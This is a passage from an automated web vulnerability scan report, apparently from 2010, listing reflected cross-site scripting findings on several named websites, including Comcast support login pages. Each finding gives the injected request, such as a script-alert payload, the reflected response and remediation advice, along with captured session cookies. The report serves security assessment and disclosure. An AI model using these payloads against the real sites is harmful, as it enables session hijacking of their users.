GET /common/dynrss/dynrss_3174_landing_.rssf5041<script>alert(1)</script>7a7940557b HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:11 GMT Content-Length: 781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/dynrss/dynrss_3174_landing_.rssf5041<script>alert(1)</script>7a7940557b"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f6e83<script>alert(1)</script>4b77393189d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /commonf6e83<script>alert(1)</script>4b77393189d/global_flash/player/player.php HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:03 GMT Content-Length: 781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/commonf6e83<script>alert(1)</script>4b77393189d/global_flash/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload f3700<script>alert(1)</script>b37fd5a9aa9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flashf3700<script>alert(1)</script>b37fd5a9aa9/player/player.php HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:03 GMT Content-Length: 781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flashf3700<script>alert(1)</script>b37fd5a9aa9/player/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8fd2b<script>alert(1)</script>dffce2489ad was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player8fd2b<script>alert(1)</script>dffce2489ad/player.php HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:04 GMT Content-Length: 781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player8fd2b<script>alert(1)</script>dffce2489ad/player.php"</strong> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8d09a<script>alert(1)</script>118ab34c06d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/global_flash/player/player.php8d09a<script>alert(1)</script>118ab34c06d HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:06 GMT Content-Length: 781 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/global_flash/player/player.php8d09a<script>alert(1)</script>118ab34c06d"</strong> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c78eb<script>alert(1)</script>9adee482cf8 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /common/js/c78eb<script>alert(1)</script>9adee482cf8 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:45:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:45:02 GMT Content-Length: 754 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/js/c78eb<script>alert(1)</script>9adee482cf8"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload a55f9<script>alert(1)</script>fbf79e45481 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /a55f9<script>alert(1)</script>fbf79e45481 HTTP/1.1 Host: www.themtn.tv Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:35:22 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:35:22 GMT Connection: close Content-Length: 744
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/a55f9<script>alert(1)</script>fbf79e45481"</strong> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78f17<script>alert(1)</script>5aa428b6bfa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages78f17<script>alert(1)</script>5aa428b6bfa/main HTTP/1.1 Host: www.themtn.tv Proxy-Connection: keep-alive Referer: http://www.themtn.tv/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:33:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:59 GMT Connection: close Content-Length: 754
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/pages78f17<script>alert(1)</script>5aa428b6bfa/main"</strong> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b76d<script>alert(1)</script>c2b6428ae8d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /pages/main7b76d<script>alert(1)</script>c2b6428ae8d HTTP/1.1 Host: www.themtn.tv Proxy-Connection: keep-alive Referer: http://www.themtn.tv/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 404 Not Found Server: Apache Vary: Accept-Encoding Content-Type: text/html Expires: Sun, 19 Dec 2010 18:34:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:34:00 GMT Connection: close Content-Length: 773
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/common/404.html?p=/pages/main7b76d<script>alert(1)</script>c2b6428ae8d"</strong> ...[SNIP]...
2.601. http://www.themtn.tv/pages/main [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.themtn.tv
Path:
/pages/main
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85403"><script>alert(1)</script>493fd61f5e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pages/main?85403"><script>alert(1)</script>493fd61f5e9=1 HTTP/1.1 Host: www.themtn.tv Proxy-Connection: keep-alive Referer: http://www.themtn.tv/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html Set-Cookie: PHPSESSID=71b7409ad8c2f41dbdfc21c59df89a9b; path=/ Vary: Accept-Encoding Expires: Sun, 19 Dec 2010 18:33:59 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:33:59 GMT Connection: close Content-Length: 30405
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en"> <head> <!-- web1.platformic.com --> <meta http-equiv="Content-Type" content="t ...[SNIP]... <input type=hidden name="85403"><script>alert(1)</script>493fd61f5e9" id = "85403"> ...[SNIP]...
2.602. http://www.tumri.net/ads/mts/6274 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tumri.net
Path:
/ads/mts/6274
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f9881'-alert(1)-'7a4c43502de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ads/mts/6274?f9881'-alert(1)-'7a4c43502de=1 HTTP/1.1 Host: www.tumri.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=020B0167569A6522B9BD387DAD716B0F; C=-18871661|2094410516; t_opt=OPT-OUT;
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Expires: Sun Dec 19 18:45:08 UTC 2010 Set-Cookie: JSESSIONID=3F97375BEDAA695CA501CE068F690C20; Path=/ads Content-Type: text/html;charset=ISO-8859-1 Content-Length: 1871 Date: Sun, 19 Dec 2010 18:45:07 GMT Connection: close
2.603. http://www.tvoneonline.com/gettvone.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tvoneonline.com
Path:
/gettvone.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a60ad"><script>alert(1)</script>76335cbc09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gettvone.asp?a60ad"><script>alert(1)</script>76335cbc09=1 HTTP/1.1 Host: www.tvoneonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.121.222.18-2331042192.30121898:lv=1292776094923:ss=1292776094923; aaa2w=1; ASPSESSIONIDCSADTBAR=DGKGNDKCOJJOPCMDFHDMEPCH;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 19 Dec 2010 18:45:08 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 7247 Content-Type: text/html Cache-control: private
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>TV One Online | Get TV One</title> <link href="/scrip ...[SNIP]... <iframe align="top" frameborder="0" height="950" width="580" scrolling="yes" src="http://tvone.viewerlink.tv/?a60ad"><script>alert(1)</script>76335cbc09=1"> ...[SNIP]...
2.604. http://www.tvoneonline.com/video/b_player.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.tvoneonline.com
Path:
/video/b_player.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 413df"><script>alert(1)</script>0091d75c0a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /video/b_player.php?413df"><script>alert(1)</script>0091d75c0a=1 HTTP/1.1 Host: www.tvoneonline.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: WT_FPC=id=174.121.222.18-2331042192.30121898:lv=1292776094923:ss=1292776094923; aaa2w=1; ASPSESSIONIDCSADTBAR=DGKGNDKCOJJOPCMDFHDMEPCH;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 19 Dec 2010 18:45:12 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-Powered-By: PHP/5.2.5 Content-type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html> <head> <title>A Different World, Lincoln Heights, Love That Girl, Way Bl ...[SNIP]... <form id="tnt_comments_submit_form" method="post" action="/video/b_player.php?413df"><script>alert(1)</script>0091d75c0a=1#comments_anchor" onsubmit="rememberfields()" style="display:none;"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 49d2a--><a>25b0fc71d41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /images49d2a--><a>25b0fc71d41/button-login.png HTTP/1.1 Host: www.tweetology.com Proxy-Connection: keep-alive Referer: http://www.csnchicago.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=87942173.1292520063.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=4dc3f7d-12cf0330131-4050c3a0-1; __utma=87942173.1105891112.1292520063.1292520063.1292520063.1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec8d"><a>f100367979f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /images/button-login.pngcec8d"><a>f100367979f HTTP/1.1 Host: www.tweetology.com Proxy-Connection: keep-alive Referer: http://www.csnchicago.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=87942173.1292520063.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=4dc3f7d-12cf0330131-4050c3a0-1; __utma=87942173.1105891112.1292520063.1292520063.1292520063.1
The value of REST URL parameter 1 is copied into an HTML comment. The payload 91c44--><a>8f884a365c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /images91c44--><a>8f884a365c5/widget/scrollbar-top-e8e8e8.png HTTP/1.1 Host: www.tweetology.com Proxy-Connection: keep-alive Referer: http://www.csnchicago.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=87942173.1292520063.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=4dc3f7d-12cf0330131-4050c3a0-1; __utma=87942173.1105891112.1292520063.1292520063.1292520063.1
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd508"><a>4cb76147745 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /images/widgetcd508"><a>4cb76147745/scrollbar-top-e8e8e8.png HTTP/1.1 Host: www.tweetology.com Proxy-Connection: keep-alive Referer: http://www.csnchicago.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utmz=87942173.1292520063.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=4dc3f7d-12cf0330131-4050c3a0-1; __utma=87942173.1105891112.1292520063.1292520063.1292520063.1
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html> <head> <link rel="stylesheet" href="/facebox/facebox.css" type="text/css" media="screen" /> <link r ...[SNIP]... <div class="widgetcd508"><a>4cb76147745"> ...[SNIP]...
2.609. http://www5.nohold.net/Comcast/Loginr.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www5.nohold.net
Path:
/Comcast/Loginr.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload aa66d"><script>alert(1)</script>e6c54017b8e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /Comcast/Loginr.aspx?aa66d"><script>alert(1)</script>e6c54017b8e=1 HTTP/1.1 Host: www5.nohold.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: k3kf32=; k3usertext2=; k3alt22=; k3displaycondition2=; k3alt32=; k3kf22=; k3rid2=75153882936399747; k3userrole2=; k3estate2=; k3eroute2=; ARPT=VXXYKQS192.168.1.164CKOKQ; k3app2=; k3alt12=; k3domain2=; k3mid2=; k3alt62=; k3lang2=; k3alt52=; k3alt42=; k3kf12=; ASP.NET_SessionId=4food245gnycm2ff2jd4y3ul; k3login2=;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 19 Dec 2010 18:13:05 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Pragma: no-cache Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 1017
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>AskComcast</ti ...[SNIP]... <iframe src="ukp.aspx?aa66d"><script>alert(1)</script>e6c54017b8e=1&donelr=1" frameborder="0"> ...[SNIP]...
2.610. http://www5.nohold.net/Comcast/login.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www5.nohold.net
Path:
/Comcast/login.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 715a9"%3balert(1)//8a78649958d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 715a9";alert(1)//8a78649958d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Comcast/login.aspx?715a9"%3balert(1)//8a78649958d=1 HTTP/1.1 Host: www5.nohold.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: k3kf32=; k3usertext2=; k3alt22=; k3displaycondition2=; k3alt32=; k3kf22=; k3rid2=75153882936399747; k3userrole2=; k3estate2=; k3eroute2=; ARPT=VXXYKQS192.168.1.164CKOKQ; k3app2=; k3alt12=; k3domain2=; k3mid2=; k3alt62=; k3lang2=; k3alt52=; k3alt42=; k3kf12=; ASP.NET_SessionId=4food245gnycm2ff2jd4y3ul; k3login2=;
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 19 Dec 2010 18:13:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Pragma: no-cache Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 1132
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Login Pa ...[SNIP]... =(document.cookie.indexOf("testcookie")!=-1)? true : false } //if cookies are enabled on client's browser if (cookieEnabled) window.location.href = "Loginr.aspx?715a9";alert(1)//8a78649958d=1"; else window.location.href = "Shared/nh_noCookie.htm"; //--> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d77dd'-alert(1)-'6b08e5b8f08 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: jobsearch.comcast.monster.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d77dd'-alert(1)-'6b08e5b8f08
Response
